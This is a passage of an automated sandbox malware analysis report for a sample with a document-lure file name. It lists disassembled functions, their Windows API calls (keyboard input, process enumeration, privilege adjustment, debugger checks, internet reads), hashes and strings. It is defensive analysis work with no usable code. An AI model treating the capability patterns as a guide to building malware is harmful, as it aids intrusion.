                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 1601658205-0
                                                      • Opcode ID: 30e1f5d0907fe9eed1d2beb091b96cfc574a0c2363533cd7446f1fd6f4a2e374
                                                      • Instruction ID: 1452d691151faf7aaa8cd265a00ef08ea5c5bbe3baa6636e61b4167c9de4b878
                                                      • Opcode Fuzzy Hash: 30e1f5d0907fe9eed1d2beb091b96cfc574a0c2363533cd7446f1fd6f4a2e374
                                                      • Instruction Fuzzy Hash: 3851E275A10200AFEB11AF24C8D6F6A77E5AB48718F18C098FA065F3D3C770AD51CBA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: ac5df2a580703db0292422df3ca5dd867d3001f09c09cfb0ae6671a4bc8380b1
                                                      • Instruction ID: df03fa609f1f3223bc35ebc7bdbb33973097162aaed0089991e1d25b69e11c7a
                                                      • Opcode Fuzzy Hash: ac5df2a580703db0292422df3ca5dd867d3001f09c09cfb0ae6671a4bc8380b1
                                                      • Instruction Fuzzy Hash: B021D3317802005FD72A8F2AD844BEA7BA9EF9D314F198068E9468B351CB71DC82CBD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: 77396398e89c17cc5b5f69b87e5e054c3dab6fac2aac0e0f9478db3d41920a24
                                                      • Instruction ID: 3aa90667b6bddb7fe9cf0f6df2f4cc5ad08d2008ab678747d2d7752ee0a4ffea
                                                      • Opcode Fuzzy Hash: 77396398e89c17cc5b5f69b87e5e054c3dab6fac2aac0e0f9478db3d41920a24
                                                      • Instruction Fuzzy Hash: 5CA2B475E2122ACBDF24DF58C844BADB7B1BF44310F64829AD815A7284EB74DDA1CF90
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002E82AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($tb4$|
                                                      • API String ID: 1659193697-3947300831
                                                      • Opcode ID: 491da48455d83366f8e82f329ee61c21aa17e3d849095e6506f777440ff6e094
                                                      • Instruction ID: aec9db0f072001218d9e58aa9fe92784346911e6c851fd45d200b66380686c66
                                                      • Opcode Fuzzy Hash: 491da48455d83366f8e82f329ee61c21aa17e3d849095e6506f777440ff6e094
                                                      • Instruction Fuzzy Hash: C7324874A507469FCB28CF1AC48196AB7F0FF48710B55C46EE49ADB3A1EB70E951CB40
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0030A6AC
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0030A6BA
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0030A79C
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030A7AB
                                                        • Part of subcall function 0029CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,002C3303,?), ref: 0029CE8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                      • String ID:
                                                      • API String ID: 1991900642-0
                                                      • Opcode ID: 06049ea181f490444fb3d40d519a89c305659f020e812692972423d2066265a6
                                                      • Instruction ID: f3448cb28bba9ec28844aafb269c820057d634d3ba1af10b9c567b3ee29176f4
                                                      • Opcode Fuzzy Hash: 06049ea181f490444fb3d40d519a89c305659f020e812692972423d2066265a6
                                                      • Instruction Fuzzy Hash: CA517B75519300AFD710EF24D886A6BBBE8FF89754F00892DF585972A2EB30D914CF92
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 002EAAAC
                                                      • SetKeyboardState.USER32(00000080), ref: 002EAAC8
                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 002EAB36
                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 002EAB88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: ab3ad3fa664fcd274677d24d5b8e7ad119533422b726e566522bf56d802668b2
                                                      • Instruction ID: 6fe8a27e012dbb910d058f6b3e780ed2ae868341482dd0c9b59f247142144125
                                                      • Opcode Fuzzy Hash: ab3ad3fa664fcd274677d24d5b8e7ad119533422b726e566522bf56d802668b2
                                                      • Instruction Fuzzy Hash: BE312E30AE0285AEFB318F66CC057FA77A6AB64314F84421EF181951D0D374A9A5C762
                                                      APIs
                                                      • _free.LIBCMT ref: 002BBB7F
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • GetTimeZoneInformation.KERNEL32 ref: 002BBB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,?,0035121C,000000FF,?,0000003F,?,?), ref: 002BBC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,?,00351270,000000FF,?,0000003F,?,?,?,0035121C,000000FF,?,0000003F,?,?), ref: 002BBC36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                      • String ID:
                                                      • API String ID: 806657224-0
                                                      • Opcode ID: 0a9d777f7ca08faa2baf673c5bbe8255870f96b26631ec83c8cd2540cb55055e
                                                      • Instruction ID: 0e46c67d0908f02d2d50507c75438cc897ec3cce4dbe535d9d6a7e5fe2dff073
                                                      • Opcode Fuzzy Hash: 0a9d777f7ca08faa2baf673c5bbe8255870f96b26631ec83c8cd2540cb55055e
                                                      • Instruction Fuzzy Hash: EC31C070954245EFCB12DF68CC809ADBBB8BF45390F144AAAE450D72B1D7B09E50CB50
                                                      APIs
                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 002FCE89
                                                      • GetLastError.KERNEL32(?,00000000), ref: 002FCEEA
                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 002FCEFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorEventFileInternetLastRead
                                                      • String ID:
                                                      • API String ID: 234945975-0
                                                      • Opcode ID: fb5a59310e5c03268f791ec94a58f0700d29a95f0e2299881569548309ce1ec1
                                                      • Instruction ID: f0da9aa8de4d41a936219bcc66c79d899a3172410dd08a32b34e7b4eddb075a6
                                                      • Opcode Fuzzy Hash: fb5a59310e5c03268f791ec94a58f0700d29a95f0e2299881569548309ce1ec1
                                                      • Instruction Fuzzy Hash: 7A21AEB156030E9BDB20DF65CA44BA6B7FCEB50794F20882AE64692151E770E9158B50
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002F5CC1
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002F5D17
                                                      • FindClose.KERNEL32(?), ref: 002F5D5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 5ddbb01b26be2c8fbfae984c10e2d84c024b0558bd74215c141472a6452feb94
                                                      • Instruction ID: 7d8c907701645f2b41dc0567ddbbc84c50bf68ad5fef0763f4ffa50d5ec654f2
                                                      • Opcode Fuzzy Hash: 5ddbb01b26be2c8fbfae984c10e2d84c024b0558bd74215c141472a6452feb94
                                                      • Instruction Fuzzy Hash: 89519A346146069FC714DF28C494AA6F7E4FF0A314F14856EEA5A8B3A1CB30EC25CF91
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 002B271A
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002B2724
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 002B2731
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: d4ba18a0e3af6812e8870dd0e2f01599a78f4cbb5862ce695ac7372a87891ae3
                                                      • Instruction ID: 11810a97d7470df8a441a8149d4df497008a910b25301ca150ff129f54e4c8e3
                                                      • Opcode Fuzzy Hash: d4ba18a0e3af6812e8870dd0e2f01599a78f4cbb5862ce695ac7372a87891ae3
                                                      • Instruction Fuzzy Hash: A831D374951318ABCB21DF68DC887DCBBB8AF08310F5041EAE81CA7261EB349F958F44
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 002F51DA
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002F5238
                                                      • SetErrorMode.KERNEL32(00000000), ref: 002F52A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: b75f3d65372bed57da6787132f03bd2d1204e3a8e35b902fde291a0e5232830c
                                                      • Instruction ID: 548c18c9cdb148900bc59fcb3a55151bbea5d8850b9035a69dfc05d6dcb3bf1f
                                                      • Opcode Fuzzy Hash: b75f3d65372bed57da6787132f03bd2d1204e3a8e35b902fde291a0e5232830c
                                                      • Instruction Fuzzy Hash: C6315075A10519DFDB00DF54D884EADBBB4FF49314F1480A9E905AB3A2DB31E856CFA0
                                                      APIs
                                                        • Part of subcall function 0029FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 002A0668
                                                        • Part of subcall function 0029FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 002A0685
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002E170D
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002E173A
                                                      • GetLastError.KERNEL32 ref: 002E174A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                      • String ID:
                                                      • API String ID: 577356006-0
                                                      • Opcode ID: d72585e5e6d246cb3a4a100e791401026ddfb9f7e7959bfa450b6f3d0b987146
                                                      • Instruction ID: eb2effc3ccf656480191313f3bac366101120fc93514bd407c8fe00951182190
                                                      • Opcode Fuzzy Hash: d72585e5e6d246cb3a4a100e791401026ddfb9f7e7959bfa450b6f3d0b987146
                                                      • Instruction Fuzzy Hash: B811C1B2460305AFD7189F54DC86DAAB7BDFF08714B20852EE05697241EB70FC61CA20
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002ED608
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002ED645
                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002ED650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: 0106b9b3f0b66ceddb8bed509a95ac2574886ed0d51b594912eb70e28411ef17
                                                      • Instruction ID: e4da727f2ebe0bb51e5246cc640d0c72c5b780b33fe7e6e65cbdd0fa7c95db08
                                                      • Opcode Fuzzy Hash: 0106b9b3f0b66ceddb8bed509a95ac2574886ed0d51b594912eb70e28411ef17
                                                      • Instruction Fuzzy Hash: 79118E75E41228BFDB108F95EC44FEFBBBCEB49B50F108121F914E7290C2704A018BA1
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002E168C
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002E16A1
                                                      • FreeSid.ADVAPI32(?), ref: 002E16B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: b3a43a8a7a315a1c67eecd04cc3051897feba5e006568427a1f3367379156363
                                                      • Instruction ID: eeeb873d7c4bc50cf7e08e2f6dd43fcedbc3dc7c43c6630ea00025c8e328015b
                                                      • Opcode Fuzzy Hash: b3a43a8a7a315a1c67eecd04cc3051897feba5e006568427a1f3367379156363
                                                      • Instruction Fuzzy Hash: 88F0F4719A0309FBDB00DFE49C89EAEBBBCEB08704F508565E501E2181E774EA448A50
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(002B28E9,?,002A4CBE,002B28E9,003488B8,0000000C,002A4E15,002B28E9,00000002,00000000,?,002B28E9), ref: 002A4D09
                                                      • TerminateProcess.KERNEL32(00000000,?,002A4CBE,002B28E9,003488B8,0000000C,002A4E15,002B28E9,00000002,00000000,?,002B28E9), ref: 002A4D10
                                                      • ExitProcess.KERNEL32 ref: 002A4D22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 04ea749e17e507b68a219b93513917bbb413b28edabb0b9a558cb7003635abb4
                                                      • Instruction ID: 343061bd79036455a15eda60b31b67f541d0a24f5b57d573277e27bb07fa4751
                                                      • Opcode Fuzzy Hash: 04ea749e17e507b68a219b93513917bbb413b28edabb0b9a558cb7003635abb4
                                                      • Instruction Fuzzy Hash: D9E0B631060548ABCF12BF54DD09A987B6DEB8A785F108414FD158A122DB79DE62CA80
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 002DD28C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: X64
                                                      • API String ID: 2645101109-893830106
                                                      • Opcode ID: 6a6a0a6249461d356aff15d19c76de93cf1ba62cf42e52a942b6dc453a213647
                                                      • Instruction ID: be0b8e704883cca7037cc88d2a46d1a1fe57c55a9abe051ea700f1491e361853
                                                      • Opcode Fuzzy Hash: 6a6a0a6249461d356aff15d19c76de93cf1ba62cf42e52a942b6dc453a213647
                                                      • Instruction Fuzzy Hash: 3ED0C9B482511DEBCF94CB90DC88DD9B37CBB08345F104152F546A2100D77095489F10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction ID: 27bc50317542a599bdff29f7f26e55d44601da04236965f31db51944cdf09c77
                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction Fuzzy Hash: 35023D71E102199FDF14CFA9C9806ADFBF2EF49324F25416AD819E7380DB31AE518B90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable is not of type 'Object'.$p#5
                                                      • API String ID: 0-123761422
                                                      • Opcode ID: bb9020c21fc44951309b1948c74e932b7200de007240effed2b2b103539d6486
                                                      • Instruction ID: ac54d324eeaea9c242b7467ebf966b0ca5bb31c399020faeaa16f6c9a83c9e8d
                                                      • Opcode Fuzzy Hash: bb9020c21fc44951309b1948c74e932b7200de007240effed2b2b103539d6486
                                                      • Instruction Fuzzy Hash: BC329E78921219DBDF14EF90D880BEDB7B5BF05304F20805AE906AB3E2D771AD65CB60
                                                      APIs
